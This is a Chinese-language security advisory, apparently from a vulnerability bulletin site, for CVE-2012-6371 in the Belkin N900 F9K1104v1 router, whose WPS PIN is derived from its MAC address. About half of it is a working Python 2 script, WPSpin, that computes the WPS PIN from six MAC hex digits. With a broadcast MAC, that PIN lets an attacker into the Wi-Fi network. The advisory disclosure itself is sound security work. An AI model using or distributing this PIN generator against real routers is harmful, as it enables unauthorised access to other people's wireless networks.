发布日期：2013-01-03
更新日期：2013-01-05

受影响系统：

Belkin Wireless Router Belkin N900 F9K1104v1

描述：

---

BUGTRAQ  ID: 57128
CVE(CAN) ID: CVE-2012-6371

Belkin Wireless Routers是美国贝尔金公司的无线路由器产品。

Belkin N900 F9K1104v1及其他版本在WPA2的实现上，用基于6位数字的LAN/WLAN MAC地址建立了WPS PIN，通过读取广播报文，远程攻击者可利用此漏洞访问Wi-Fi网络。

<*来源：ZhaoChunsheng （e.novellalorente@student.ru.nl）
  
  链接：http://ednolo.alumnos.upv.es/?p=1295
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

@author       : e.novellalorente@student.ru.nl
Original work : ZhaoChunsheng 04/07/2012

'''

import sys

VERSION    = 0
SUBVERSION = 2

def usage():
    print "[+] WPSpin %d.%d " % (VERSION, SUBVERSION)
    print "[*] Usage : python WPSpin.py 123456"
    sys.exit(0)

def wps_pin_checksum(pin):
    accum = 0

    while(pin):
        accum += 3 * (pin % 10)
        pin /= 10
        accum += pin % 10
        pin /= 10
    return  (10 - accum % 10) % 10

try:
    if (len(sys.argv[1]) == 6):
        p = int(sys.argv[1] , 16) % 10000000
        print "[+] WPS pin is : %07d%d" % (p, wps_pin_checksum(p))
    else:
        usage()
except Exception:
    usage()

建议：

---

厂商补丁：

Belkin
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.belkin.com/

浏览次数：4138
严重程度：0（网友投票）